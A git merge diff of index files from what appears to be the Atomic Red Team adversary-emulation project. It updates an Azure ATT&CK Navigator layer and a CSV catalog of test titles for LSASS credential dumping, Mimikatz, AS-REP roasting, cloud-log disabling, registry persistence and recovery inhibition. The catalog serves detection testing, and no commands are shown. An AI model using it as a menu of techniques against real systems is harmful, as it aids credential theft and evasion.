Merge branch 'master' into T1562.008-o365_exchange_audit_log_disabled

atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas-azure.json

@@ -1 +1 @@
-{"version":"4.3","name":"Atomic Red Team (Iaas:Azure)","description":"Atomic Red Team (Iaas:Azure) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1098","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1098","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]}]}
+{"version":"4.3","name":"Atomic Red Team (Iaas:Azure)","description":"Atomic Red Team (Iaas:Azure) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1098","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1098","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1562.008","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1562","score":100,"enabled":true}]}

atomics/Indexes/Indexes-CSV/index.csv

@@ -4,6 +4,7 @@ credential-access,T1003.008,/etc/passwd and /etc/shadow,2,Access /etc/passwd (Lo
 credential-access,T1003.008,/etc/passwd and /etc/shadow,3,"Access /etc/{shadow,passwd} with a standard bin that's not cat",df1a55ae-019d-4120-bc35-94f4bc5c4b0a,bash
 credential-access,T1003.008,/etc/passwd and /etc/shadow,4,"Access /etc/{shadow,passwd} with shell builtins",f5aa6543-6cb2-4fae-b9c2-b96e14721713,bash
 credential-access,T1558.004,AS-REP Roasting,1,Rubeus asreproast,615bd568-2859-41b5-9aed-61f6a88e48dd,powershell
+credential-access,T1558.004,AS-REP Roasting,2,Get-DomainUser with PowerView,d6139549-7b72-4e48-9ea1-324fc9bdf88a,powershell
 credential-access,T1552.003,Bash History,1,Search Through Bash History,3cfde62b-7c33-4b26-a61e-755d6131c8ce,sh
 credential-access,T1552.007,Container API,1,ListSecrets,43c3a49d-d15c-45e6-b303-f6e177e44a9a,bash
 credential-access,T1552.007,Container API,2,Cat the contents of a Kubernetes service account token file,788e0019-a483-45da-bcfe-96353d46820f,sh
@@ -52,19 +53,18 @@ credential-access,T1056.001,Keylogging,5,SSHD PAM keylogger,81d7d2ad-d644-4b6a-b
 credential-access,T1056.001,Keylogging,6,Auditd keylogger,a668edb9-334e-48eb-8c2e-5413a40867af,sh
 credential-access,T1557.001,LLMNR/NBT-NS Poisoning and SMB Relay,1,LLMNR Poisoning with Inveigh (PowerShell),deecd55f-afe0-4a62-9fba-4d1ba2deb321,powershell
 credential-access,T1003.004,LSA Secrets,1,Dumping LSA Secrets,55295ab0-a703-433b-9ca4-ae13807de12f,command_prompt
-credential-access,T1003.001,LSASS Memory,1,Windows Credential Editor,0f7c5301-6859-45ba-8b4d-1fac30fc31ed,command_prompt
-credential-access,T1003.001,LSASS Memory,2,Dump LSASS.exe Memory using ProcDump,0be2230c-9ab3-4ac2-8826-3199b9a0ebf8,command_prompt
-credential-access,T1003.001,LSASS Memory,3,Dump LSASS.exe Memory using comsvcs.dll,2536dee2-12fb-459a-8c37-971844fa73be,powershell
-credential-access,T1003.001,LSASS Memory,4,Dump LSASS.exe Memory using direct system calls and API unhooking,7ae7102c-a099-45c8-b985-4c7a2d05790d,command_prompt
-credential-access,T1003.001,LSASS Memory,5,Dump LSASS.exe Memory using NanoDump,dddd4aca-bbed-46f0-984d-e4c5971c51ea,command_prompt
-credential-access,T1003.001,LSASS Memory,6,Dump LSASS.exe Memory using Windows Task Manager,dea6c349-f1c6-44f3-87a1-1ed33a59a607,manual
-credential-access,T1003.001,LSASS Memory,7,Offline Credential Theft With Mimikatz,453acf13-1dbd-47d7-b28a-172ce9228023,command_prompt
-credential-access,T1003.001,LSASS Memory,8,LSASS read with pypykatz,c37bc535-5c62-4195-9cc3-0517673171d8,command_prompt
-credential-access,T1003.001,LSASS Memory,9,Dump LSASS.exe Memory using Out-Minidump.ps1,6502c8f0-b775-4dbd-9193-1298f56b6781,powershell
-credential-access,T1003.001,LSASS Memory,10,Create Mini Dump of LSASS.exe using ProcDump,7cede33f-0acd-44ef-9774-15511300b24b,command_prompt
-credential-access,T1003.001,LSASS Memory,11,Powershell Mimikatz,66fb0bc1-3c3f-47e9-a298-550ecfefacbc,powershell
-credential-access,T1003.001,LSASS Memory,12,Dump LSASS with .Net 5 createdump.exe,9d0072c8-7cca-45c4-bd14-f852cfa35cf0,powershell
-credential-access,T1003.001,LSASS Memory,13,Dump LSASS.exe using imported Microsoft DLLs,86fc3f40-237f-4701-b155-81c01c48d697,powershell
+credential-access,T1003.001,LSASS Memory,1,Dump LSASS.exe Memory using ProcDump,0be2230c-9ab3-4ac2-8826-3199b9a0ebf8,command_prompt
+credential-access,T1003.001,LSASS Memory,2,Dump LSASS.exe Memory using comsvcs.dll,2536dee2-12fb-459a-8c37-971844fa73be,powershell
+credential-access,T1003.001,LSASS Memory,3,Dump LSASS.exe Memory using direct system calls and API unhooking,7ae7102c-a099-45c8-b985-4c7a2d05790d,command_prompt
+credential-access,T1003.001,LSASS Memory,4,Dump LSASS.exe Memory using NanoDump,dddd4aca-bbed-46f0-984d-e4c5971c51ea,command_prompt
+credential-access,T1003.001,LSASS Memory,5,Dump LSASS.exe Memory using Windows Task Manager,dea6c349-f1c6-44f3-87a1-1ed33a59a607,manual
+credential-access,T1003.001,LSASS Memory,6,Offline Credential Theft With Mimikatz,453acf13-1dbd-47d7-b28a-172ce9228023,command_prompt
+credential-access,T1003.001,LSASS Memory,7,LSASS read with pypykatz,c37bc535-5c62-4195-9cc3-0517673171d8,command_prompt
+credential-access,T1003.001,LSASS Memory,8,Dump LSASS.exe Memory using Out-Minidump.ps1,6502c8f0-b775-4dbd-9193-1298f56b6781,powershell
+credential-access,T1003.001,LSASS Memory,9,Create Mini Dump of LSASS.exe using ProcDump,7cede33f-0acd-44ef-9774-15511300b24b,command_prompt
+credential-access,T1003.001,LSASS Memory,10,Powershell Mimikatz,66fb0bc1-3c3f-47e9-a298-550ecfefacbc,powershell
+credential-access,T1003.001,LSASS Memory,11,Dump LSASS with .Net 5 createdump.exe,9d0072c8-7cca-45c4-bd14-f852cfa35cf0,powershell
+credential-access,T1003.001,LSASS Memory,12,Dump LSASS.exe using imported Microsoft DLLs,86fc3f40-237f-4701-b155-81c01c48d697,powershell
 credential-access,T1003.003,NTDS,1,Create Volume Shadow Copy with vssadmin,dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f,command_prompt
 credential-access,T1003.003,NTDS,2,Copy NTDS.dit from Volume Shadow Copy,c6237146-9ea6-4711-85c9-c56d263a6b03,command_prompt
 credential-access,T1003.003,NTDS,3,Dump Active Directory Database with NTDSUtil,2364e33d-ceab-4641-8468-bfb1d7cc2723,command_prompt
@@ -102,6 +102,7 @@ credential-access,T1552.004,Private Keys,6,ADFS token signing and encryption cer
 credential-access,T1552.004,Private Keys,7,ADFS token signing and encryption certificates theft - Remote,cab413d8-9e4a-4b8d-9b84-c985bd73a442,powershell
 credential-access,T1003.007,Proc Filesystem,1,Dump individual process memory with sh (Local),7e91138a-8e74-456d-a007-973d67a0bb80,sh
 credential-access,T1003.007,Proc Filesystem,2,Dump individual process memory with Python (Local),437b2003-a20d-4ed8-834c-4964f24eec63,sh
+credential-access,T1003.007,Proc Filesystem,3,Capture Passwords with MimiPenguin,a27418de-bdce-4ebd-b655-38f04842bf0c,bash
 credential-access,T1606.002,SAML Tokens,1,Golden SAML,b16a03bc-1089-4dcc-ad98-30fe8f3a2b31,powershell
 credential-access,T1003.002,Security Account Manager,1,"Registry dump of SAM, creds, and secrets",5c2571d0-1572-416d-9676-812e64ca9f44,command_prompt
 credential-access,T1003.002,Security Account Manager,2,Registry parse with pypykatz,a96872b2-cbf3-46cf-8eb4-27e8c0e85263,command_prompt
@@ -163,6 +164,7 @@ privilege-escalation,T1055.004,Asynchronous Procedure Call,1,Process Injection v
 privilege-escalation,T1053.001,At (Linux),1,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh
 privilege-escalation,T1053.002,At (Windows),1,At.exe Scheduled task,4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8,command_prompt
 privilege-escalation,T1547.002,Authentication Package,1,Authentication Package,be2590e8-4ac3-47ac-b4b5-945820f2fbe9,powershell
+privilege-escalation,T1547,Boot or Logon Autostart Execution,1,Add a driver,cb01b3da-b0e7-4e24-bf6d-de5223526785,command_prompt
 privilege-escalation,T1548.002,Bypass User Account Control,1,Bypass UAC using Event Viewer (cmd),5073adf8-9a50-4bd9-b298-a9bd2ead8af9,command_prompt
 privilege-escalation,T1548.002,Bypass User Account Control,2,Bypass UAC using Event Viewer (PowerShell),a6ce9acf-842a-4af6-8f79-539be7608e2b,powershell
 privilege-escalation,T1548.002,Bypass User Account Control,3,Bypass UAC using Fodhelper,58f641ea-12e3-499a-b684-44dee46bd182,command_prompt
@@ -237,6 +239,8 @@ privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,4,Suspicious v
 privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,5,Suspicious jse file run from startup Folder,dade9447-791e-4c8f-b04b-3a35855dfa06,powershell
 privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,6,Suspicious bat file run from startup Folder,5b6768e4-44d2-44f0-89da-a01d1430fd5e,powershell
 privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,7,Add Executable Shortcut Link to User Startup Folder,24e55612-85f6-4bd6-ae74-a73d02e3441d,powershell
+privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,8,Add persistance via Recycle bin,bda6a3d6-7aa7-4e89-908b-306772e9662f,command_prompt
+privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,9,SystemBC Malware-as-a-Service Registry,9dc7767b-30c1-4cc4-b999-50cab5e27891,powershell
 privilege-escalation,T1053.005,Scheduled Task,1,Scheduled Task Startup Script,fec27f65-db86-4c2d-b66c-61945aee87c2,command_prompt
 privilege-escalation,T1053.005,Scheduled Task,2,Scheduled task Local,42f53695-ad4a-4546-abb6-7d837f644a71,command_prompt
 privilege-escalation,T1053.005,Scheduled Task,3,Scheduled task Remote,2e5eac3e-327b-4a88-a0c0-c4057039a8dd,command_prompt
@@ -349,6 +353,7 @@ defense-evasion,T1140,Deobfuscate/Decode Files or Information,5,Base64 decoding
 defense-evasion,T1140,Deobfuscate/Decode Files or Information,6,Hex decoding with shell utilities,005943f9-8dd5-4349-8b46-0313c0a9f973,sh
 defense-evasion,T1006,Direct Volume Access,1,Read volume boot sector via DOS device path (PowerShell),88f6327e-51ec-4bbf-b2e8-3fea534eab8b,powershell
 defense-evasion,T1562.008,Disable Cloud Logs,1,AWS CloudTrail Changes,9c10dc6b-20bd-403a-8e67-50ef7d07ed4e,sh
+defense-evasion,T1562.008,Disable Cloud Logs,2,Azure - Eventhub Deletion,5e09bed0-7d33-453b-9bf3-caea32bff719,powershell
 defense-evasion,T1562.002,Disable Windows Event Logging,1,Disable Windows IIS HTTP Logging,69435dcf-c66f-4ec0-a8b1-82beb76b34db,powershell
 defense-evasion,T1562.002,Disable Windows Event Logging,2,Kill Event Log Service Threads,41ac52ba-5d5e-40c0-b267-573ed90489bd,powershell
 defense-evasion,T1562.002,Disable Windows Event Logging,3,Impair Windows Audit Log Policy,5102a3a7-e2d7-4129-9e45-f483f2e0eea8,command_prompt
@@ -419,6 +424,7 @@ defense-evasion,T1564.001,Hidden Files and Directories,4,Create Windows Hidden F
 defense-evasion,T1564.001,Hidden Files and Directories,5,Hidden files,3b7015f2-3144-4205-b799-b05580621379,sh
 defense-evasion,T1564.001,Hidden Files and Directories,6,Hide a Directory,b115ecaf-3b24-4ed2-aefe-2fcb9db913d3,sh
 defense-evasion,T1564.001,Hidden Files and Directories,7,Show all hidden files,9a1ec7da-b892-449f-ad68-67066d04380c,sh
+defense-evasion,T1564.001,Hidden Files and Directories,8,Hide Files Through Registry,f650456b-bd49-4bc1-ae9d-271b5b9581e7,command_prompt
 defense-evasion,T1564.002,Hidden Users,1,Create Hidden User using UniqueID < 500,4238a7f0-a980-4fff-98a2-dfc0a363d507,sh
 defense-evasion,T1564.002,Hidden Users,2,Create Hidden User using IsHidden option,de87ed7b-52c3-43fd-9554-730f695e7f31,sh
 defense-evasion,T1564.003,Hidden Window,1,Hidden Window,f151ee37-9e2b-47e6-80e4-550b9f999b7a,powershell
@@ -466,6 +472,7 @@ defense-evasion,T1036.004,Masquerade Task or Service,2,Creating W32Time similar
 defense-evasion,T1036,Masquerading,1,System File Copied to Unusual Location,51005ac7-52e2-45e0-bdab-d17c6d4916cd,command_prompt
 defense-evasion,T1036,Masquerading,2,Malware Masquerading and Execution from Zip File,4449c89b-ec82-43a4-89c1-91e2f1abeecc,powershell
 defense-evasion,T1036.005,Match Legitimate Name or Location,1,Execute a process from a directory masquerading as the current parent directory.,812c3ab8-94b0-4698-a9bf-9420af23ce24,sh
+defense-evasion,T1036.005,Match Legitimate Name or Location,2,Masquerade as a built-in system executable,35eb8d16-9820-4423-a2a1-90c4f5edd9ca,powershell
 defense-evasion,T1112,Modify Registry,1,Modify Registry of Current User Profile - cmd,1324796b-d0f6-455a-b4ae-21ffee6aa6b9,command_prompt
 defense-evasion,T1112,Modify Registry,2,Modify Registry of Local Machine - cmd,282f929a-6bc5-42b8-bd93-960c3ba35afe,command_prompt
 defense-evasion,T1112,Modify Registry,3,Modify registry to store logon credentials,c0413fb5-33e2-40b7-9b6f-60b29f4a7a18,command_prompt
@@ -473,6 +480,31 @@ defense-evasion,T1112,Modify Registry,4,Add domain to Trusted sites Zone,cf44767
 defense-evasion,T1112,Modify Registry,5,Javascript in registry,15f44ea9-4571-4837-be9e-802431a7bfae,powershell
 defense-evasion,T1112,Modify Registry,6,Change Powershell Execution Policy to Bypass,f3a6cceb-06c9-48e5-8df8-8867a6814245,powershell
 defense-evasion,T1112,Modify Registry,7,BlackByte Ransomware Registry Changes - CMD,4f4e2f9f-6209-4fcf-9b15-3b7455706f5b,command_prompt
+defense-evasion,T1112,Modify Registry,8,BlackByte Ransomware Registry Changes - Powershell,0b79c06f-c788-44a2-8630-d69051f1123d,powershell
+defense-evasion,T1112,Modify Registry,9,Disable Windows Registry Tool,ac34b0f7-0f85-4ac0-b93e-3ced2bc69bb8,command_prompt
+defense-evasion,T1112,Modify Registry,10,Disable Windows CMD application,d2561a6d-72bd-408c-b150-13efe1801c2a,powershell
+defense-evasion,T1112,Modify Registry,11,Disable Windows Task Manager application,af254e70-dd0e-4de6-9afe-a994d9ea8b62,command_prompt
+defense-evasion,T1112,Modify Registry,12,Disable Windows Notification Center,c0d6d67f-1f63-42cc-95c0-5fd6b20082ad,command_prompt
+defense-evasion,T1112,Modify Registry,13,Disable Windows Shutdown Button,6e0d1131-2d7e-4905-8ca5-d6172f05d03d,command_prompt
+defense-evasion,T1112,Modify Registry,14,Disable Windows LogOff Button,e246578a-c24d-46a7-9237-0213ff86fb0c,command_prompt
+defense-evasion,T1112,Modify Registry,15,Disable Windows Change Password Feature,d4a6da40-618f-454d-9a9e-26af552aaeb0,command_prompt
+defense-evasion,T1112,Modify Registry,16,Disable Windows Lock Workstation Feature,3dacb0d2-46ee-4c27-ac1b-f9886bf91a56,command_prompt
+defense-evasion,T1112,Modify Registry,17,Activate Windows NoDesktop Group Policy Feature,93386d41-525c-4a1b-8235-134a628dee17,command_prompt
+defense-evasion,T1112,Modify Registry,18,Activate Windows NoRun Group Policy Feature,d49ff3cc-8168-4123-b5b3-f057d9abbd55,command_prompt
+defense-evasion,T1112,Modify Registry,19,Activate Windows NoFind Group Policy Feature,ffbb407e-7f1d-4c95-b22e-548169db1fbd,command_prompt
+defense-evasion,T1112,Modify Registry,20,Activate Windows NoControlPanel Group Policy Feature,a450e469-ba54-4de1-9deb-9023a6111690,command_prompt
+defense-evasion,T1112,Modify Registry,21,Activate Windows NoFileMenu Group Policy Feature,5e27bdb4-7fd9-455d-a2b5-4b4b22c9dea4,command_prompt
+defense-evasion,T1112,Modify Registry,22,Activate Windows NoClose Group Policy Feature,12f50e15-dbc6-478b-a801-a746e8ba1723,command_prompt
+defense-evasion,T1112,Modify Registry,23,Activate Windows NoSetTaskbar Group Policy Feature,d29b7faf-7355-4036-9ed3-719bd17951ed,command_prompt
+defense-evasion,T1112,Modify Registry,24,Activate Windows NoTrayContextMenu Group Policy Feature,4d72d4b1-fa7b-4374-b423-0fe326da49d2,command_prompt
+defense-evasion,T1112,Modify Registry,25,Activate Windows NoPropertiesMyDocuments Group Policy Feature,20fc9daa-bd48-4325-9aff-81b967a84b1d,command_prompt
+defense-evasion,T1112,Modify Registry,26,Hide Windows Clock Group Policy Feature,8023db1e-ad06-4966-934b-b6a0ae52689e,command_prompt
+defense-evasion,T1112,Modify Registry,27,Windows HideSCAHealth Group Policy Feature,a4637291-40b1-4a96-8c82-b28f1d73e54e,command_prompt
+defense-evasion,T1112,Modify Registry,28,Windows HideSCANetwork Group Policy Feature,3e757ce7-eca0-411a-9583-1c33b8508d52,command_prompt
+defense-evasion,T1112,Modify Registry,29,Windows HideSCAPower Group Policy Feature,8d85a5d8-702f-436f-bc78-fcd9119496fc,command_prompt
+defense-evasion,T1112,Modify Registry,30,Windows HideSCAVolume Group Policy Feature,7f037590-b4c6-4f13-b3cc-e424c5ab8ade,command_prompt
+defense-evasion,T1112,Modify Registry,31,Windows Modify Show Compress Color And Info Tip Registry,795d3248-0394-4d4d-8e86-4e8df2a2693f,command_prompt
+defense-evasion,T1112,Modify Registry,32,Windows Powershell Logging Disabled,95b25212-91a7-42ff-9613-124aca6845a8,command_prompt
 defense-evasion,T1218.005,Mshta,1,Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject,1483fab9-4f52-4217-a9ce-daa9d7747cae,command_prompt
 defense-evasion,T1218.005,Mshta,2,Mshta executes VBScript to execute malicious command,906865c3-e05f-4acc-85c4-fbc185455095,command_prompt
 defense-evasion,T1218.005,Mshta,3,Mshta Executes Remote HTML Application (HTA),c4b97eeb-5249-4455-a607-59f95485cb45,powershell
@@ -569,6 +601,7 @@ defense-evasion,T1218,Signed Binary Proxy Execution,6,Microsoft.Workflow.Compile
 defense-evasion,T1218,Signed Binary Proxy Execution,7,Renamed Microsoft.Workflow.Compiler.exe Payload Executions,4cc40fd7-87b8-4b16-b2d7-57534b86b911,powershell
 defense-evasion,T1218,Signed Binary Proxy Execution,8,Invoke-ATHRemoteFXvGPUDisablementCommand base test,9ebe7901-7edf-45c0-b5c7-8366300919db,powershell
 defense-evasion,T1218,Signed Binary Proxy Execution,9,DiskShadow Command Execution,0e1483ba-8f0c-425d-b8c6-42736e058eaa,powershell
+defense-evasion,T1218,Signed Binary Proxy Execution,10,Load Arbitrary DLL via Wuauclt (Windows Update Client),49fbd548-49e9-4bb7-94a6-3769613912b8,command_prompt
 defense-evasion,T1216,Signed Script Proxy Execution,1,SyncAppvPublishingServer Signed Script PowerShell Command Execution,275d963d-3f36-476c-8bef-a2a3960ee6eb,command_prompt
 defense-evasion,T1216,Signed Script Proxy Execution,2,manage-bde.wsf Signed Script Command Execution,2a8f2d3c-3dec-4262-99dd-150cb2a4d63a,command_prompt
 defense-evasion,T1027.002,Software Packing,1,Binary simply packed by UPX (linux),11c46cd8-e471-450e-acb8-52a1216ae6a4,sh
@@ -613,6 +646,7 @@ persistence,T1098,Account Manipulation,4,Azure - adding user to Azure AD role,0e
 persistence,T1098,Account Manipulation,5,Azure - adding service principal to Azure AD role,92c40b3f-c406-4d1f-8d2b-c039bf5009e4,powershell
 persistence,T1098,Account Manipulation,6,Azure - adding user to Azure role in subscription,1a94b3fc-b080-450a-b3d8-6d9b57b472ea,powershell
 persistence,T1098,Account Manipulation,7,Azure - adding service principal to Azure role in subscription,c8f4bc29-a151-48da-b3be-4680af56f404,powershell
+persistence,T1098,Account Manipulation,8,AzureAD - adding permission to application,94ea9cc3-81f9-4111-8dde-3fb54f36af4b,powershell
 persistence,T1137.006,Add-ins,1,Code Executed Via Excel Add-in File (Xll),441b1a0f-a771-428a-8af0-e99e4698cda3,powershell
 persistence,T1098.001,Additional Cloud Credentials,1,Azure AD Application Hijacking - Service Principal,b8e747c3-bdf7-4d71-bce2-f1df2a057406,powershell
 persistence,T1098.001,Additional Cloud Credentials,2,Azure AD Application Hijacking - App Registration,a12b5531-acab-4618-a470-0dafb294a87a,powershell
@@ -628,6 +662,7 @@ persistence,T1197,BITS Jobs,1,Bitsadmin Download (cmd),3c73d728-75fb-4180-a12f-6
 persistence,T1197,BITS Jobs,2,Bitsadmin Download (PowerShell),f63b8bc4-07e5-4112-acba-56f646f3f0bc,powershell
 persistence,T1197,BITS Jobs,3,"Persist, Download, & Execute",62a06ec5-5754-47d2-bcfc-123d8314c6ae,command_prompt
 persistence,T1197,BITS Jobs,4,Bits download using desktopimgdownldr.exe (cmd),afb5e09e-e385-4dee-9a94-6ee60979d114,command_prompt
+persistence,T1547,Boot or Logon Autostart Execution,1,Add a driver,cb01b3da-b0e7-4e24-bf6d-de5223526785,command_prompt
 persistence,T1176,Browser Extensions,1,Chrome (Developer Mode),3ecd790d-2617-4abf-9a8c-4e8d47da9ee1,manual
 persistence,T1176,Browser Extensions,2,Chrome (Chrome Web Store),4c83940d-8ca5-4bb2-8100-f46dc914bc3f,manual
 persistence,T1176,Browser Extensions,3,Firefox,cb790029-17e6-4c43-b96f-002ce5f10938,manual
@@ -693,6 +728,8 @@ persistence,T1547.001,Registry Run Keys / Startup Folder,4,Suspicious vbs file r
 persistence,T1547.001,Registry Run Keys / Startup Folder,5,Suspicious jse file run from startup Folder,dade9447-791e-4c8f-b04b-3a35855dfa06,powershell
 persistence,T1547.001,Registry Run Keys / Startup Folder,6,Suspicious bat file run from startup Folder,5b6768e4-44d2-44f0-89da-a01d1430fd5e,powershell
 persistence,T1547.001,Registry Run Keys / Startup Folder,7,Add Executable Shortcut Link to User Startup Folder,24e55612-85f6-4bd6-ae74-a73d02e3441d,powershell
+persistence,T1547.001,Registry Run Keys / Startup Folder,8,Add persistance via Recycle bin,bda6a3d6-7aa7-4e89-908b-306772e9662f,command_prompt
+persistence,T1547.001,Registry Run Keys / Startup Folder,9,SystemBC Malware-as-a-Service Registry,9dc7767b-30c1-4cc4-b999-50cab5e27891,powershell
 persistence,T1098.004,SSH Authorized Keys,1,Modify SSH Authorized Keys,342cc723-127c-4d3a-8292-9c0c6b4ecadc,bash
 persistence,T1053.005,Scheduled Task,1,Scheduled Task Startup Script,fec27f65-db86-4c2d-b66c-61945aee87c2,command_prompt
 persistence,T1053.005,Scheduled Task,2,Scheduled task Local,42f53695-ad4a-4546-abb6-7d837f644a71,command_prompt
@@ -745,6 +782,7 @@ impact,T1490,Inhibit System Recovery,5,Windows - Delete Volume Shadow Copies via
 impact,T1490,Inhibit System Recovery,6,Windows - Delete Backup Files,6b1dbaf6-cc8a-4ea6-891f-6058569653bf,command_prompt
 impact,T1490,Inhibit System Recovery,7,Windows - wbadmin Delete systemstatebackup,584331dd-75bc-4c02-9e0b-17f5fd81c748,command_prompt
 impact,T1490,Inhibit System Recovery,8,Windows - Disable the SR scheduled task,1c68c68d-83a4-4981-974e-8993055fa034,command_prompt
+impact,T1490,Inhibit System Recovery,9,Disable System Restore Through Registry,66e647d1-8741-4e43-b7c1-334760c2047f,command_prompt
 impact,T1491.001,Internal Defacement,1,Replace Desktop Wallpaper,30558d53-9d76-41c4-9267-a7bd5184bed3,powershell
 impact,T1496,Resource Hijacking,1,macOS/Linux - Simulate CPU Load with Yes,904a5a0e-fb02-490d-9f8d-0e256eb37549,bash
 impact,T1489,Service Stop,1,Windows - Stop service using Service Controller,21dfb440-830d-4c86-a3e5-2a491d5a8d04,command_prompt
@@ -778,6 +816,8 @@ discovery,T1087.002,Domain Account,7,Adfind - Enumerate Active Directory User Ob
 discovery,T1087.002,Domain Account,8,Adfind - Enumerate Active Directory Exchange AD Objects,5e2938fb-f919-47b6-8b29-2f6a1f718e99,command_prompt
 discovery,T1087.002,Domain Account,9,Enumerate Default Domain Admin Details (Domain),c70ab9fd-19e2-4e02-a83c-9cfa8eaa8fef,command_prompt
 discovery,T1087.002,Domain Account,10,Enumerate Active Directory for Unconstrained Delegation,46f8dbe9-22a5-4770-8513-66119c5be63b,powershell
+discovery,T1087.002,Domain Account,11,Get-DomainUser with PowerView,93662494-5ed7-4454-a04c-8c8372808ac2,powershell
+discovery,T1087.002,Domain Account,12,Enumerate Active Directory Users with ADSISearcher,02e8be5a-3065-4e54-8cc8-a14d138834d3,powershell
 discovery,T1069.002,Domain Groups,1,Basic Permission Groups Discovery Windows (Domain),dd66d77d-8998-48c0-8024-df263dc2ce5d,command_prompt
 discovery,T1069.002,Domain Groups,2,Permission Groups Discovery PowerShell (Domain),6d5d8c96-3d2a-4da9-9d6d-9a9d341899a7,powershell
 discovery,T1069.002,Domain Groups,3,Elevated group enumeration using net group (Domain),0afb5163-8181-432e-9405-4322710c0c37,command_prompt
@@ -786,6 +826,11 @@ discovery,T1069.002,Domain Groups,5,Find local admins on all machines in domain
 discovery,T1069.002,Domain Groups,6,Find Local Admins via Group Policy (PowerView),64fdb43b-5259-467a-b000-1b02c00e510a,powershell
 discovery,T1069.002,Domain Groups,7,Enumerate Users Not Requiring Pre Auth (ASRepRoast),870ba71e-6858-4f6d-895c-bb6237f6121b,powershell
 discovery,T1069.002,Domain Groups,8,Adfind - Query Active Directory Groups,48ddc687-82af-40b7-8472-ff1e742e8274,command_prompt
+discovery,T1069.002,Domain Groups,9,Enumerate Active Directory Groups with Get-AdGroup,3d1fcd2a-e51c-4cbe-8d84-9a843bad8dc8,powershell
+discovery,T1069.002,Domain Groups,10,Enumerate Active Directory Groups with ADSISearcher,9f4e344b-8434-41b3-85b1-d38f29d148d0,powershell
+discovery,T1069.002,Domain Groups,11,Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting),43fa81fb-34bb-4b5f-867b-03c7dbe0e3d8,powershell
+discovery,T1069.002,Domain Groups,12,Get-DomainGroupMember with PowerView,46352f40-f283-4fe5-b56d-d9a71750e145,powershell
+discovery,T1069.002,Domain Groups,13,Get-DomainGroup with PowerView,5a8a181c-2c8e-478d-a943-549305a01230,powershell
 discovery,T1482,Domain Trust Discovery,1,Windows - Discover domain trusts with dsquery,4700a710-c821-4e17-a3ec-9e4c81d6845f,command_prompt
 discovery,T1482,Domain Trust Discovery,2,Windows - Discover domain trusts with nltest,2e22641d-0498-48d2-b9ff-c71e496ccdbe,command_prompt
 discovery,T1482,Domain Trust Discovery,3,Powershell enumerate domains and forests,c58fbc62-8a62-489e-8f2d-3565d7d96f30,powershell
@@ -797,6 +842,7 @@ discovery,T1083,File and Directory Discovery,1,File and Directory Discovery (cmd
 discovery,T1083,File and Directory Discovery,2,File and Directory Discovery (PowerShell),2158908e-b7ef-4c21-8a83-3ce4dd05a924,powershell
 discovery,T1083,File and Directory Discovery,3,Nix File and Directory Discovery,ffc8b249-372a-4b74-adcd-e4c0430842de,sh
 discovery,T1083,File and Directory Discovery,4,Nix File and Directory Discovery 2,13c5e1ae-605b-46c4-a79f-db28c77ff24e,sh
+discovery,T1083,File and Directory Discovery,5,Simulating MAZE Directory Enumeration,c6c34f61-1c3e-40fb-8a58-d017d88286d8,powershell
 discovery,T1087.001,Local Account,1,Enumerate all accounts (Local),f8aab3dd-5990-4bf8-b8ab-2226c951696f,sh
 discovery,T1087.001,Local Account,2,View sudoers access,fed9be70-0186-4bde-9f8a-20945f9370c2,sh
 discovery,T1087.001,Local Account,3,View accounts with UID 0,c955a599-3653-4fe5-b631-f11c00eb0397,sh
@@ -835,9 +881,14 @@ discovery,T1201,Password Policy Discovery,4,Examine password expiration policy -
 discovery,T1201,Password Policy Discovery,5,Examine local password policy - Windows,4588d243-f24e-4549-b2e3-e627acc089f6,command_prompt
 discovery,T1201,Password Policy Discovery,6,Examine domain password policy - Windows,46c2c362-2679-4ef5-aec9-0e958e135be4,command_prompt
 discovery,T1201,Password Policy Discovery,7,Examine password policy - macOS,4b7fa042-9482-45e1-b348-4b756b2a0742,bash
+discovery,T1201,Password Policy Discovery,8,Get-DomainPolicy with PowerView,3177f4da-3d4b-4592-8bdc-aa23d0b2e843,powershell
+discovery,T1201,Password Policy Discovery,9,Enumerate Active Directory Password Policy with get-addefaultdomainpasswordpolicy,b2698b33-984c-4a1c-93bb-e4ba72a0babb,powershell
 discovery,T1120,Peripheral Device Discovery,1,Win32_PnPEntity Hardware Inventory,2cb4dbf2-2dca-4597-8678-4d39d207a3a5,powershell
 discovery,T1057,Process Discovery,1,Process Discovery - ps,4ff64f0b-aaf2-4866-b39d-38d9791407cc,sh
 discovery,T1057,Process Discovery,2,Process Discovery - tasklist,c5806a4f-62b8-4900-980b-c7ec004e9908,command_prompt
+discovery,T1057,Process Discovery,3,Process Discovery - Get-Process,3b3809b6-a54b-4f5b-8aff-cb51f2e97b34,powershell
